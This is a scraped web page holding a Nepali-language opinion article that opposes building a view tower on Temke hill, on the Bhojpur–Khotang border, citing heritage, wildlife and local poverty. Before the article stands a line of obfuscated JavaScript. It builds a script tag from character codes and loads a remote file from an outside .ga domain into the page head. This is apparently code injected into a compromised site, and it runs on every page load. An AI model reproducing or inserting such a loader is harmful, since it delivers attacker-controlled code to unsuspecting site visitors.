Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); समाप्तितिर टेम्के पहाड ! – जनदिशा

समाप्तितिर टेम्के पहाड !

Last Updated Date:

  •  तायुछांग लामा ‘किरण’

पूर्व भोजपुर र खोटाङको सिमानामा रहेको टेम्के पहाडको अस्तित्व समाप्त हुने गरी टेम्के मयुंङ् गाउँपालिका र प्रदेश नम्बर १को सरकारले नाङ्गो हस्तक्षेप गर्दै टेम्के टावरको शिलान्यास गर्नुले ऐतिहासिक टेम्के चुलीको अस्तित्व सङ्कट ग्रस्त बन्दै छ । प्राकृतिक रूपले बनेको ऐतिहासिक ,धार्मिक, सांस्कृतिक र प्राकृतिक सम्पदाहरूको संरक्षण गर्नुको सट्टा विकासको नाममा हुने बिध्वंशले टेम्के चुलीको ऐतिहासिक मूल्य मान्यता गुमाउँदै छ ।

विगतमा गोपाल किरातीको नेतृत्वमा किरात गणतान्त्रिक टावरको नाममा सुन्दर टेम्के चुलीको स्वरूप बिग्रिने गरी डोजर चलाइयो । अहिले मुख्यमन्त्री शेर धन राईले टेम्के टावर बनाउने भनेर शिलान्यास गरे । हाम्रो समाज विकासको नाममा विनाश तिर त गईरहेको छैन ? विकास गर्न जनताको शरीर नाङ्गो छ, खेत मल जलको अभावमा बाँझो छ । जनता बेरोजगार छन्, सडकको स्थिति बर्खा लागे सँगै धान रोप्ने हुन्छ तर खोटाङ भोजपुरको सान टेम्के पहाडमा डोजर चलाउँदा अनि सिसाको टावर बनाउँदा टेम्केको आफ्नो पहिचान गुम्दै छ भन्ने कुनै विज्ञको समझमा किन न आएको होला ? टावर नै बनाउने हो भने पनि भोजपुर खोटाङमा अन्त सयौँ स्थानहरू छन् सबैको कुदृष्टि टेम्के पहाडमा नै किन ?

टेम्के पहाडमा निर्माणारार्थ डिजाइन गरिएको भ्यु टावर

नेपाल सरकारले प्राकृतिक बनोटलाई व्यवस्थापन गर्न नजानेर बिगारेको अनेकौँ घटनाहरू छन् । त्यही बाटोमा अहिले सरकारी  टोलि टेम्के पहाडमा नाङ्गो हस्तक्षेप गर्दै छ । टेम्केको पहिचान सहित यस क्षेत्र मुन्धुम ट्रेकिंग रूटको आकर्षणको रूपमा नेपाल सरकारले राखे पनि टेम्केको पहिचान गुमाउने काम त्यही सरकारी संयन्त्रले गरेको देख्दा हाम्रो सरकार र सरकार चलाउनेहरूको दिमागमा प्राकृतिक सम्पदाको सही सदुपयोग संरक्षण गर्ने भन्दा पनि दुरुपयोग र ध्वस्त गर्ने मात्र रहेछ भन्ने प्रस्ट भएको छ ।

चखेवा देखि टेम्के पहाड सम्मको बाटो र पाँचधारे क्षेत्र देखि टेम्के सम्म जोड्ने सुन्दर पैदल बाटो निर्माण गर्ने, त्यस क्षेत्रमा रहेका जडीबुटीहरूको संरक्षण र सदुपयोग तथा वन जंगलको सुरक्षा गर्नुको साटो सुन्दर टेम्के चुली माथि एक पछि अर्को मानव संरचना निर्माण गर्नु भनेको विकाश नभई विनाश गर्नु हो । टेम्केमा बनेका नयाँ संरचनाहरूले टेम्केको आकर्षण दिन प्रतिदिन घट्दो गतिमा जाँदै छ ।

सरकारले टेम्के जस्ता प्राकृतिक, धार्मिक, सांस्कृतिक चुलीहरूमा मात्र होइन सगरमाथाको टुप्पोमा पनि टावर बनाउने निर्णय नगर्ला भन्न सकिँदैन । जनताको जनजीवनलाई दुखबाट सुखतिर परिवर्तन गर्नुको सट्टा प्राकृतिक सम्पदा र ऐतिहासिक, सांस्कृतिक, सम्पदा माथि हमला गरेर विकास गर्छु भन्नु अहिलेको समय-सङ्गत भएन ।

देशको दूरदराजमा मानिस खोला वारिपारि गर्न तुइनको प्रयोग गर्न बाध्य छन् तर यही पूर्वी नेपालको टेम्के चुलीमा लाखौँ खर्चेर प्राकृतिक सम्पदाको दोहन गर्न आउने मुख्य मन्त्रीज्यूले के सोच्नु हुन्छ कुन्नि ? जनताको घरमा खाने पानीको अभाव छ, प्रभावकारी स्वास्थ्य उपचारको अभाव छ, अझै जनताहरू सुकुम्वासी छन्, बेरोजगार छन्, काम गरेर सालभर खान नपुग्ने जनताहरूको संख्या भोजपुरमा लगभग चालीस प्रतिशत पुग्छ तर विकास – विकास भनेर लाखौँ लाखको लगानीमा टेम्के टावरको डिपिआर निर्माण र शिलान्यास गर्न दगुर्नु भनेको दौरा लगाएर सुरुवाल लगाउन बिर्सिनु जस्तै हो ।

यो लेख लेखिसके पछि मेरो क्रियाकलापहरु धेरैलाई लाग्ला यो विकास विरोधी हो । या यो विकास विरोधी गतिविधिहरु गर्ने अराजक हो भनेर ! तर विकास गर्न सरकारले जनता छोडेर टेम्के चुली पुग्नु कति सम्मको मूर्खता हो ? टावर बनाउने भए भोजपुर भित्र अनेकौँ ठाउँहरू छन् त्यता बनाए हुन्छ । सरकारसँग सामर्थ्य छ भने पिखुवा दोभानमा टेम्के भन्दा अग्लो टावर बनाए हुन्छ नि ! पर्यटकहरू भित्राउनको लागि टेम्के चुलीमा टावर निर्माण गर्ने भन्ने लाग्छ भने टेम्के आफैमा एउटा प्राकृतिक भ्यु टावर हो, पर्यटकीय क्षेत्र हो ।

भ्यु टावर बनाउन पहाडको चुचुरो चाहिन्छ भने हुँदैन । छिमेकी देश चीनमा समुद्र छेउको पुतोंग शांगहाइमा विश्वको दोस्रो अग्लो शांगहाइ टावरको निर्माण गरेका छन् र विश्वभरबाट अहिले यो टावर हेर्नको लागि मात्रै लगभग बीस हजार पर्यटक दैनिक आउँछन् । पर्यटक भित्याउनकै लागि प्राकृतिक संरचना बिगार्नु कालिदासले रुखमा चढेर फेदमा काट्नु जस्तो हो ।  तर नेपाल सरकारलाई किन ऐतिहासिक क्षेत्रको विनाश गरेर टावर निर्माण गर्नु पर्ने हो ?

करोड-करोड लगानी नेपाल सरकारले कहाँबाट ल्याएर टेम्के चुलीको दोहन गर्न लागेको हो ? कतै विदेशी ऋण लिएर त टेम्के टावर बनाउन लागिएको होइन ? यदि हो भने विकासको नाममा जनता माथि ऋण थुपार्ने काम बन्द गर्नु पर्छ । टेम्के चुलीलाई देखाएर मागी खाने भाँडो वा विदेशी ऋण माग्ने कामहरु बन्द गर्नु पर्छ।

सरकारले टेम्के चुली पदयात्रा गर्न त्यस क्षेत्रको बाटोघाटो, पानी र आराम चौतारी निर्माण गर्नुको सट्टा टेम्के चुलीको विनाशतिर बढ्नु उचित छैन । यदि टेम्के क्षेत्रको विकाश गर्न चाहेको हो भने टेम्केमा कम्तिमा पनि २० वर्ष देखि यता बनेका सम्पूर्ण संरचनाहरूको स्थानान्तरण गर्नु पर्छ र ऐतिहासिक टेम्के चुलीको व्यवस्थापन र संरक्षणमा लाग्नु पर्छ । टेम्के चुली सम्म जानको लागि चखेवा, पाँचधारे र थाटि सम्म व्यवस्थित सडक तथा सुनसरी उदयपुर तथा हलेशि क्षेत्र बाट केबलकार सञ्जाल यस क्षेत्र सम्म जोड्न सकिन्छ । टेम्के चुली सम्म सवारी साधन लाने काम बन्द गरेर पाँचधारे चखेवा क्षेत्रमा पार्किङ तथा होटेल/ होमस्टे व्यवसाय गर्न सकिन्छ।

यस क्षेत्रको विकासले  स्थानीय जनताले प्रत्यक्ष लाभ लिने  गरी विकास गर्ने अनेकौँ तरिकाहरू छन् । तर यो टेम्के सम्म सडक सञ्जाल र टेम्के टावर निर्माणले साँच्चै टेम्के पहाडको प्राकृतिक, सांस्कृतिक तथा ऐतिहासिक पहिचानहरू गुमाउने र यस क्षेत्रको बहुमूल्य जडिबुटी संरक्षित जनवारहरू नेपाली राष्ट्रिय पक्षी डाँफे चरा, विश्व मै दुर्लभ रातो पान्डा र चितुवा लगायतको चोरी, निकासी तथा विस्थापित हुने पक्का छ । यस्तो हचुवा विकासले यस क्षेत्रको जनतालाई कुनै पनि लाभ मिल्ने छैन बरु उल्टो टेम्केले आफ्नू पहिचान गुमाउदै जाने छ । त्यसैले टेम्के क्षेत्रमा भएका तथा मानव निर्मित नयाँ संरचनाहरूलाई तत्काल हटाएर ऐतिहासिक टेम्केको पुननिर्माण तथा संरक्षणमा जुट्ने बेला हो यो ।

टेम्के पहाड भोजपुर, खोटाङको मात्र प्राकृतिक सम्पदा होइन । यो नेपाल कै उत्कृष्ट १०० गन्तव्यहरू भित्रको एक हो । टेम्के समग्र नेपालीको सम्पत्ति हो । यस क्षेत्र किरात सभ्यताको ऐतिहासिक ठाउँ हो । साल्पा राजा, गोल्मा राजाहरू तथा ऐतिहासिक चोग्याल राज्यहरुको हजारौँ साल पुरानो मिथकहरू यस टेम्के चुली सँग सम्बन्धित छन् । भोलिको पुस्ताले टेम्के चुलीको टावरलाई भन्दा प्राकृतिक टेम्के चुलीको खोजी गर्ने छ । यो टेम्के चुली हाम्रो युगको लागि मात्र होइन, त्यसैले पुर्खाले सुरक्षित गरिदिएको टेम्के चुलीमा मानव निर्मित हर्कतहरू पूर्ण रूपले बन्देज गरेर आफ्नू भावी पुस्ताको लागि सुरक्षित गर्न समग्र खोटाङ भोजपुरका आम दाजु-भाइ तथा दिदी-बहिनीहरू लाग्नु पर्छ । (तस्बिर साभार : सामाजिक सन्जाल)

यो सामग्री सेयर गर्नुहोस

तपाईलाई माथिको समाचार/लेख कस्तो लाग्यो ? प्रतिक्रिया दिनुहोस ।
Top